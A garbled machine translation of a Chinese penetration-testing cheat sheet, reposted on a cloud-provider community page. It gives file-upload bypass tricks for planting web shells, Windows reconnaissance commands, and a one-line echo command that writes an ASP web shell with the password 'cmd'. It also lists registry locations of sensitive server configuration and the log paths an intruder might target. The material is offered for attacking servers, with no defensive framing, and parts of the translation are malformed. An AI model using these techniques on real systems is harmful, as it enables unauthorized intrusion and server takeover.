Penetration ideas + skills

Source: Internet
Author: User

 

Upload Vulnerability shell:

1. directly upload asp. asa. jsp. cer. php. aspx. htr. cdx .... And get the shell.

2. Adding spaces or a few points after the suffix during uploading may be surprising. Example: *. asp, *. asp...

3. Use the dual extension for upload, for example, *. jpg. asa format (which can also be used with the 2.1 extension ).

4.gif File Header Spoofing

5. Duplicate upload with the same name is also very OK. :

 

Common commands During Penetration

Set, systeminfo, ipconfig, ping. You can use these commands to receive more system information.

Tasklist/svc view the pid of the service

Netstat-ano, netstat-abnv

Fsutil.exe fsinfo drives list all drive letters

Dir d: \ * conn *. */s find the database connection file

Telnet 218.25.88.234 3389 indicates whether the port is open to the outside.

Echo ^ <% execute (request ("cmd") % ^> e: \ k \ X. asp write a sentence to the e: \ k \ directory, and the password is cmd.

Type d: \ wwwroot \ web \ k6.asp> d: \ wwwroot \ 123 \. asp transfers k6.asp under d: \ wwwroot \ web \ To d: \ wwwroot \ 123 \ and renames it as. asp

 

Registry sensitive information:

HKEY_LOCAL_MACHINE \ SOFTWARE \ MySQL AB \ mysql registry location

HKEY_LOCAL_MACHINE \ SOFTWARE \ HZHOST \ CONFIG \ Huazhong host location

HKEY_LOCAL_MACHINE \ SOFTWARE \ cat soft \ serv-u location

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp \ PortNamber port 3389

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ Parameters 1433 Port

HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ MSFtpsvc \ Parameters \ Virtual Roots \ Server ftp path

 

Physical path of the server log file:

Security log file: % systemroot % \ system32 \ config \ SecEvent. EVT

System log file: % systemroot % \ system32 \ config \ SysEvent. EVT

Application Log File: % systemroot % \ system32 \ config \ AppEvent. EVT

FTP connection Log and HTTPD transaction Log: systemroot % \ system32 \ LogFiles \. The following sub-folders are available for FTP and Web Service logs respectively. The suffix is. Log.

Norton AntiVirus log: C: \ Documents ents and Settings \ All Users \ Application Data \ Symantec

The copyright is unknown. Please contact the author to add it in time.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.